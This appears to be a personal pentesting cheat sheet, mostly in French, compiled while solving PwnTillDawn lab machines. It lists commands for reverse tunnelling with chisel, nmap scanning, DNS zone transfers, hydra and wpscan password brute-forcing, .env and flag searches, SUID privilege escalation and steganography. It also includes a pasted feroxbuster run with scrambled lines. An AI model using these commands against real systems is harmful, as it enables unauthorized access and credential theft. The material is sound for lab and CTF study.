Категории: Все - hacking - tools

по Anthony Guilbert 2 дней назад

213

Pwntilldawn Mindmap FULL

The document delves into various hacking tools and techniques used in cybersecurity, particularly focusing on the Pwntilldawn platform. It highlights the use of feroxbuster for enumerating directories and mentions the challenges faced, such as SSL errors when connecting to certain URLs.

Pwntilldawn Mindmap FULL

Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding
Si on a un acces SSH

sshuttle -r user@ip -N

Web en écoute sur localhost

Sur la victime

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Ne pas oublier d'adapter le port 8080 selon les situations

Sur l'host

chisel server -port 7777 --reverse

Verifier ce qui écoute sur localhost

NMAP

nmap -sV -sC -T5 -p- ip
Nmap Automator
nmap -sV -Pn -p- -T5 ip
sudo nmap -sF -p1-100 -T4

Protocoles divers

DNS
! AXFR !

dig @mortysserver.com mortysserver.com axfr

Ajout dans /etc/hosts si besoin

Exemple : 10.150.150.57 rickscontrolpanel.mortysserver.com

SSH
Test de se co pour la bannière
Connexion si on a la clé privée

ssh -i id_rsa user@ip

POP3
hydra -l operator -P wordlist.txt ip pop3
Mysql
mysql -h localhost -u sql_user -p
mysqldump -u root -p --all-databases > alldb.sql
FTP
Login anon à vérif
showmount -e IP
NFS
sudo mount -t nfs ip:/remote /local
sudo umount 10.150.150.59:/nfsroot

Subtopic

rpcinfo IP
SMTP
hydra -l operator -P wordlist.txt ipip smtp
smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup
netstat -antup
Dumb shell upgrade
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

asterisk@Billing:/tmp$ cd /usr/local/src/magn

ctory

script /dev/null -qc /bin/bash
Si besoin des erreurs mais pas affichée ( ex webshell php )
Ajout de "2>fichier" apres la commande

puis faire un cat du fichier

Could not connect to https://bricks.thm/ due to SSL errors (run with -k to ignore), skipping...

=> error sending request for url (https://bricks.thm/): error trying to connect: error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:2091: (self-signed certificate)ERROR: Could not connect to any target provided

──────────────────────────────────────────────────

───────────────────────────┴──────────────────────

🏁 Press [ENTER] to use the Scan Management Menu™

───────────────────────────┬──────────────────────

🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
🔃 Recursion Depth │ 4
🏁 HTTP methods │ [GET]
🔎 Extract Links │ true
🦡 User-Agent │ feroxbuster/2.10.3
💥 Timeout (secs) │ 7
👌 Status Codes │ All Status Codes!
📖 Wordlist │ /usr/share/wordlists/dirb/big.txt
🚀 Threads │ 50
🎯 Target Url │ https://bricks.thm/

by Ben "epi" Risher 🤓 ver: 2.10.3

| |___ | \ | \ | \__, \__/ / \ | |__/ |___

|__ |__ |__) |__) | / ` / \ \_/ | | \ |__

anthony@NS5x-NS7xAU:~/Desktop/tools/UDF$ feroxbuster --url https://bricks.thm/ --wordlist /usr/share/wordlists/dirb/big.txt

___ ___ __ __ __ __ __ ___

Find files

@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
Linux
find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null
find ./* | grep FLAG3
find / -type f -name 'FLAG[0-9].txt' 2>/dev/null
find / -name FLAG6.txt 2>/dev/null
find / -type f -name ".env" 2>/dev/null

Privesc

SUID
find / -perm -u=s -type f 2>/dev/null
searchsploit
searchsploit -m chemin
searchsploit xxxx
Python Library Hijacking
Script qui tourne en root avec des imports de librairies
LXC/LXD
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
Metasploit
Upgrade session : sessions -u
Windows
Shell

Upgrade shell

sessions -u id

ps --> migrate pid

msfconsole

multi/recon/localexploitsuggester

linpeas
sudo python3 -m http.server port ( attaquant ) et wget
Lien symbolique
ln -s /root /home/michael/importantfiles/rootbackup

WEB

Wordpress
Bruteforce

wpscan --url url_wordpress --passwords wordlist

Enumération users

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u
Check template et plugins vulnérables

wpscan --url url --enumerate vp,vt

PHP Filters
python3 script.py --chain ''

https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py

Enumération
Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

-k pour certif autosigné

Bruteforce Forms
Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

hydra -l operator -P wordlist.txt 10.150.150.56

Stegano

searchsploit
Depixelise
Unredactor
Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

Stereogram
https://piellardj.github.io/stereogram-solver/
Aperisolve
Steghide
steghide extract -sf screen.jpeg